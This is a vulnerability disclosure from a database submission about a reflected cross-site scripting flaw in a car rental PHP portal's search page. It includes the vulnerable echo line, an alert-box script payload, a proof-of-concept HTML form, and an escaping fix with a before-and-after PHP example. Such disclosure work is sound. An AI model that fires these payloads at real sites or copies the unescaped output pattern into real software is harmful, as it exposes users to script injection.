Submit #435179: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax

Title: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax
Description:

[XSS vulnerability] found in Car Rental Portal 3.0 - (search.php)

Affected Project: Car Rental Portal
Web: PHP
Vendor: PHPGurukul
Official Website: (https://phpgurukul.com/car-rental-project-php-mysql-free-download/)
Version: 3.0
Updated: 05 June 2024
Vulnerable file: /search.php
Injection parameter: searchdata
Size: 16.0 MB
Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b

Vulnerability Description:

The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack.

Vulnerable code:

```php
<h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1>
```

Injection Payload Tested:

We set `searchdata` to: `"><script>alert('XSS')</script>`

Execution:

When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`.

Demonstration:

Below is how `search.php` looks: https://i.postimg.cc/mg6Vs6Vd/1.png

As it is a POST request, we need to use a file test_form.html with the following content to be able to trigger the XSS popup:

```html
<!DOCTYPE html>
<html>
<head>
  <title>Search Form</title>
</head>
<body>
  <form action="http://localhost:8000/carrental/search.php" method="POST">
    <input type="text" name="searchdata" value='"><script>alert("XSS")</script>'>
    <input type="submit" value="Search">
  </form>
</body>
</html>
```

Then we have to open it in the browser, for example: file:///home/username/Desktop/test_form.html

https://i.postimg.cc/nVYkzL09/2.png

After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered: https://i.postimg.cc/t4fdfnCw/3.png

Recommendation for Preventing XSS:

To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters. Example:

```php
// Retrieve the search data from the POST request that search.php receives
$searchData = isset($_POST['searchdata']) ? $_POST['searchdata'] : '';
// Escape the output to prevent XSS
$safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8');
```

> One Click Can Change Everything: Be Secure.
Source: https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md
User: secuserx (UID 76735)
Submission: 01/11/2024 01:17 (2 years ago)
Moderation: 01/11/2024 18:07 (17 hours later)
Status: Accepted
VulDB entry: 282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata cross site scripting]
Points: 20
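
The recommendation in the description, applied to the reported output line and to the quoted-attribute context the description mentions. This is an added example, not code from the report or from PHPGurukul: the function names `e`, `search_term`, `heading_vulnerable`, `heading_fixed` and `search_box_fixed` are hypothetical, and the sample input is the payload string quoted in the description.

```php
<?php
// Added example, not PHPGurukul's code; all function names are hypothetical.

// Encode for HTML text and quoted-attribute contexts. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE keeps invalid UTF-8 from yielding an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read the POST field search.php receives. Array input (searchdata[]=x)
// is rejected so only strings reach the encoder.
function search_term(array $post): string
{
    $raw = $post['searchdata'] ?? '';
    return is_string($raw) ? trim($raw) : '';
}

// "Before": the pattern from the report, user input echoed as-is.
function heading_vulnerable(array $post): string
{
    return '<h1>Search Result of keyword "' . ($post['searchdata'] ?? '') . '"</h1>';
}

// "After": same markup, encoded at the point of output.
function heading_fixed(array $post): string
{
    return '<h1>Search Result of keyword "' . e(search_term($post)) . '"</h1>';
}

// Attribute context: the value must be quoted and encoded with ENT_QUOTES.
function search_box_fixed(array $post): string
{
    return '<input type="text" name="searchdata" value="' . e(search_term($post)) . '">';
}

// Constructed input: the payload string quoted in the report.
$post = ['searchdata' => '"><script>alert(\'XSS\')</script>'];

foreach (['heading_vulnerable', 'heading_fixed', 'search_box_fixed'] as $render) {
    $html  = $render($post);
    $state = stripos($html, '<script') === false ? 'encoded' : 'RAW <script> PRESENT';
    printf("%-20s %s\n  %s\n", $render, $state, $html);
}
```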
